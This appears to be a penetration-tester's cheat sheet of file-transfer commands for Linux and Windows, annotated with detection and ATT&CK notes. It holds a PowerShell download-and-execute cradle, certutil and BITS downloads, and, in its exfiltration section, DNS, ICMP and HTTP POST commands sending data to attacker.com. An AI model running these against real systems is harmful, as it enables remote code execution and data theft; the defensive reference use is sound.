File Transfers
Linux to Linux
HTTP Server
# Each server below serves the current working directory over plain HTTP with
# no authentication, so anyone who can reach port 8000 can read every file
# under it. Start it from a dedicated staging directory that holds only the
# files to be transferred, and stop it as soon as the transfer is done.
# Python 3 (listens on all interfaces by default; --bind ADDRESS restricts it)
python3 -m http.server 8000
# PHP (0.0.0.0 = all interfaces; .php files in the directory are executed,
# not returned as source)
php -S 0.0.0.0:8000
# Ruby
ruby -run -e httpd . -p 8000
# Download
# Plain HTTP gives neither confidentiality nor integrity: compare a sha256sum
# of the file on both ends before using it.
wget http://attacker.com:8000/file
curl http://attacker.com:8000/file -o file
SCP
# scp runs over SSH, so the transfer is encrypted and the server is
# authenticated by its host key; check the fingerprint on first connection
# instead of accepting it blindly.
# Upload to remote
scp file.txt user@remote:/path/
# Download from remote
scp user@remote:/path/file.txt ./
# Recursive (copies the whole directory tree)
scp -r directory user@remote:/path/
Netcat
# Raw TCP: no encryption, no authentication, no integrity check. The listener
# writes whatever the first client to connect sends, so compare checksums
# (e.g. sha256sum) on both ends afterwards.
# Receiver (-l listen, -v verbose, -n no DNS lookups, -p port)
nc -lvnp 4444 > received_file
# Sender
nc 10.10.10.10 4444 < file_to_send
# With progress (pv reports throughput while piping the file)
pv file | nc 10.10.10.10 4444
Base64
# Base64 is an encoding, not encryption: it makes binary data safe for text
# channels, and anyone who captures the stream can decode it.
# Encode
base64 file > file.b64
# Decode
base64 -d file.b64 > file
# One-liner transfer (first line is the sender, second line the receiver)
cat file | base64 | nc 10.10.10.10 4444
nc -lvnp 4444 | base64 -d > file
FTP
# FTP sends credentials and file contents in cleartext.
# Start FTP server (no -u/-P given, so no account is configured; binding to
# port 21 normally requires root)
python -m pyftpdlib -p 21
# With credentials (the password is passed on the command line, so it is
# visible in the process list and in shell history)
python -m pyftpdlib -p 21 -u user -P pass
# Download
ftp 10.10.10.10
# get file.txt
SSH
# Download
scp user@remote:/path/file ./
# Upload
scp file user@remote:/path/
# Through jump host (-J is ProxyJump: the SSH session to the target is
# tunnelled through jumphost, which forwards the traffic but does not
# terminate the encryption)
scp -J jumphost user@target:/path/file ./
Windows to Linux
PowerShell
# Download from web (wget and iwr are aliases of Invoke-WebRequest in
# Windows PowerShell; all three lines do the same thing)
Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe
wget http://10.10.10.10/file.exe -OutFile C:\file.exe
iwr http://10.10.10.10/file.exe -OutFile C:\file.exe
# Download and execute
# The script text is fetched over plain HTTP and passed straight to
# Invoke-Expression, so nothing verifies what gets run.
# Detection: PowerShell Script Block Logging (event ID 4104) and AMSI see the
# downloaded content; Net.WebClient combined with IEX on a command line is a
# common alerting pattern.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
# Upload via POST (file contents are sent as the request body, in cleartext)
Invoke-RestMethod -Uri http://10.10.10.10/upload -Method Post -InFile C:\file.txt
Certutil
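# Download file
# Detection: certutil with -urlcache and a URL on its command line is a
# well-known living-off-the-land download pattern (MITRE ATT&CK T1105) and is
# commonly alerted on by EDR and process-creation logging.
certutil -urlcache -f http://10.10.10.10/file.exe file.exe
certutil -urlcache -split -f http://10.10.10.10/file.exe file.exe
# Verify
# Compare the digest with one obtained over a trusted channel. SHA256 is used
# because MD5 is not collision-resistant and is unsuitable for integrity
# checks.
certutil -hashfile file.exe SHA256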
BITSAdmin
# BITS jobs are handled by the Background Intelligent Transfer Service rather
# than by the calling process. Abuse of BITS is tracked as MITRE ATT&CK T1197.
# Detection: review jobs with `bitsadmin /list /allusers /verbose` and the
# Microsoft-Windows-Bits-Client/Operational event log.
# Download
bitsadmin /transfer mydownload /download /priority high http://10.10.10.10/file.exe C:\file.exe
# Alternative syntax (create the job, add the file, start it, then finalise)
bitsadmin /create mydownload
bitsadmin /addfile mydownload http://10.10.10.10/file.exe C:\file.exe
bitsadmin /resume mydownload
bitsadmin /complete mydownload
SMB
# Start SMB server (Impacket)
# The first form accepts connections without credentials. Current Windows
# builds typically refuse unauthenticated guest SMB2 access by default, which
# is what the second form addresses. Its password is given on the command
# line, so it is visible in the process list and in shell history.
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -username user -password pass
# On Windows
# Detection: outbound SMB (TCP 445) from a workstation to an address outside
# the organisation's file servers is rare and worth blocking or alerting on.
net use \\10.10.10.10\share
copy \\10.10.10.10\share\file.exe C:\file.exe
# Or directly
copy \\10.10.10.10\share\file.exe C:\file.exe
# Upload
copy C:\file.txt \\10.10.10.10\share\
FTP
# Create FTP script
# The commands, including the login, are written to ftp.txt in the current
# directory and stay on disk until the file is deleted. FTP itself is
# cleartext.
echo open 10.10.10.10 > ftp.txt
echo user anonymous >> ftp.txt
echo pass >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo bye >> ftp.txt
# Execute (-s: runs the commands listed in the file)
ftp -s:ftp.txt
VBScript
download.vbs
' Fetches http://10.10.10.10/file.exe and writes the response body to
' C:\file.exe. The HTTP status is not checked and nothing verifies the content,
' so whatever the server returns is saved.
' Detection: a script host (wscript/cscript) making an outbound HTTP request
' and then writing an executable to disk is a useful process and file
' correlation to alert on.
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
' Third argument False = synchronous request: send() blocks until it completes.
objXMLHTTP.open "GET", "http://10.10.10.10/file.exe", False
objXMLHTTP.send()
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
' Type 1 = binary stream (adTypeBinary), required for a non-text payload.
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
' Rewind to the start of the stream before saving.
objADOStream.Position = 0
' No save option is given, so the default applies (fails if the file exists).
objADOStream.SaveToFile "C:\file.exe"
objADOStream.Close
Linux to Windows
Python HTTP Server + PowerShell
# On Linux (attacker)
# Port 80 is a privileged port, so this normally needs root. The server
# exposes the whole current directory without authentication.
python3 -m http.server 80
# On Windows (target)
# Plain HTTP: verify the file's hash after download (e.g. Get-FileHash).
powershell -c "Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile C:\file.exe"
SMB Server
# Start SMB server (Linux)
# No -username/-password is set, so the share accepts unauthenticated access.
impacket-smbserver share /path/to/files -smb2support
# Access from Windows
# The first line runs the executable directly from the remote share. The
# second maps the share to drive Z:.
\\10.10.10.10\share\file.exe
net use Z: \\10.10.10.10\share
Netcat
Advanced Methods
Curl
# Upload file (-F sends a multipart/form-data POST; @ reads the file content)
curl -X POST -F "file=@file.txt" http://10.10.10.10/upload
# Download
curl http://10.10.10.10/file.txt -o file.txt
# With authentication
# Over http:// the Basic credentials cross the network effectively in
# cleartext. On the command line they also show up in the process list and in
# shell history; a netrc file or an interactive prompt (-u username) avoids
# that.
curl -u username:password http://10.10.10.10/file.txt -o file.txt
# Follow redirects (the final host may differ from the one requested)
curl -L http://10.10.10.10/file.txt -o file.txt
# Resume download ("-C -" lets curl work out the offset from the partial file)
curl -C - http://10.10.10.10/file.txt -o file.txt
Wget
# Download
wget http://10.10.10.10/file.txt
# Save with different name
wget http://10.10.10.10/file.txt -O newname.txt
# Resume
wget -c http://10.10.10.10/file.txt
# Recursive download (follows links; can fetch far more than expected)
wget -r http://10.10.10.10/
# Mirror site
wget -m http://10.10.10.10/
# With authentication
# The password on the command line is visible in the process list and in
# shell history, and over http:// it crosses the network in cleartext.
wget --http-user=username --http-password=password http://10.10.10.10/file.txt
Rsync
# -a archive mode (preserves permissions, times, symlinks), -v verbose,
# -z compress in transit. With a user@host:path argument rsync runs over SSH.
# Download
rsync -avz user@remote:/path/to/file ./
# Upload
rsync -avz file user@remote:/path/
# With SSH key (keep key.pem readable only by its owner)
rsync -avz -e "ssh -i key.pem" user@remote:/path/file ./
# Delete after transfer
# --remove-source-files deletes each source file once it has been transferred
# successfully. Directories are left in place. Confirm the destination copy
# before relying on this.
rsync -avz --remove-source-files file user@remote:/path/
SCP with Port Forwarding
# Local port forward
# Local port 2222 is forwarded through jumphost to target:22. scp then talks
# to localhost:2222, so the host key presented there is the target's. Verify
# its fingerprint rather than accepting it blindly.
ssh -L 2222:target:22 jumphost
scp -P 2222 user@localhost:/path/file ./
# ProxyJump (same result in one command, with no listening local port)
scp -J jumphost user@target:/path/file ./
Encoding/Compression
Base64
# Base64 only makes the data text-safe; it adds no confidentiality.
# Encode and transfer
base64 file | nc 10.10.10.10 4444
# Receive and decode
nc -lvnp 4444 | base64 -d > file
# PowerShell
# The first line prints the file as a Base64 string. The second decodes a
# Base64 string back into a file. Both hold the whole file in memory.
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\file.exe"))
[IO.File]::WriteAllBytes("C:\file.exe", [Convert]::FromBase64String("BASE64_HERE"))
Compression
# Tar and gzip (the archive is streamed to stdout and piped into netcat)
tar -czf - directory | nc 10.10.10.10 4444
# Receive
# This extracts whatever the first client to connect sends. Run it in an
# empty, dedicated directory so an unexpected archive cannot overwrite
# existing files.
nc -lvnp 4444 | tar -xzf -
# Zip
zip -r - directory | nc 10.10.10.10 4444
# 7zip
7z a -so -t7z directory | nc 10.10.10.10 4444
Exfiltration
DNS
# Data leaves the host as the leftmost label of DNS queries for names under
# attacker.com (MITRE ATT&CK T1048, exfiltration over an alternative protocol).
# Detection: log queries at the recursive resolver and alert on bursts of
# lookups to a single parent domain with long or high-entropy leftmost labels,
# or on an unusually high count of unique subdomains per client. Blocking
# direct outbound DNS from endpoints forces the traffic through that resolver.
# Encode data in subdomain (one query per whitespace-separated word)
for line in $(cat data.txt); do
dig $line.attacker.com
done
# Base32 encode (padding stripped, output cut into pieces of up to 63
# characters, the maximum length of a DNS label)
for chunk in $(cat data.txt | base32 | tr -d '=' | fold -w 63); do
dig $chunk.attacker.com
done
ICMP
# Send data in ICMP packets
# The file is hex-dumped and split into single bytes. Each byte is used as the
# pad pattern (-p) of one echo request.
# Detection: echo requests whose payload differs from the operating system's
# default pattern, or changes from one packet to the next, are anomalous.
# Monitor or restrict outbound ICMP at the perimeter (MITRE ATT&CK T1048).
file=file.txt
for byte in $(xxd -p $file | fold -w2); do
ping -c 1 -p $byte attacker.com
done
# Capture on attacker (writes ICMP traffic seen on eth0 to icmp.pcap)
tcpdump -i eth0 icmp -w icmp.pcap
HTTP POST
# All three send the file in an HTTP POST over plain http://, so a web proxy
# or network sensor sees the content.
# Detection: large or repeated POST bodies from workstations to
# uncategorised or newly seen domains, via proxy logs or DLP.
# Upload via curl
curl -X POST -F "file=@data.txt" http://attacker.com/upload.php
# Python (uses the third-party requests package)
python -c 'import requests; requests.post("http://attacker.com/upload", files={"file": open("data.txt", "rb")})'
# PowerShell
Invoke-RestMethod -Uri http://attacker.com/upload -Method Post -InFile C:\data.txt
Cloud Storage
AWS S3
# The AWS CLI uses the credentials of the configured profile, so the bucket
# policy and that identity's permissions decide who can read what is uploaded.
# Detection: S3 object-level operations are CloudTrail data events, which are
# not logged unless enabled. Uploads to buckets outside the organisation's
# accounts map to MITRE ATT&CK T1567.002.
# Upload
aws s3 cp file.txt s3://bucket/file.txt
# Download
aws s3 cp s3://bucket/file.txt ./
# Sync
# Uploads everything under the current directory recursively, including
# dotfiles such as .env or .git. Preview with --dryrun and narrow with
# --exclude.
aws s3 sync . s3://bucket/
Google Drive (gdrive)
Dropbox (dbxcli)
WebDAV
# Start WebDAV server
# Listens on all interfaces on port 80 over plain HTTP. Everything under
# --root is exposed, so point it at a dedicated directory.
wsgidav --host=0.0.0.0 --port=80 --root=/path/to/share
# On Windows
# "net use *" picks a free drive letter and prints it. The copy below assumes
# it was Z:.
net use * http://10.10.10.10/
copy file.exe Z:\
# On Linux
cadaver http://10.10.10.10/
# put file.txt
Socat
# File transfer
# Plain TCP, like netcat: no encryption or authentication, so verify a
# checksum on both ends. socat also offers OPENSSL address types where
# confidentiality is needed.
# Receiver (writes the incoming stream to received_file, creating it if needed)
socat TCP-LISTEN:4444,reuseaddr FILE:received_file,create
# Sender
socat FILE:file_to_send TCP:10.10.10.10:4444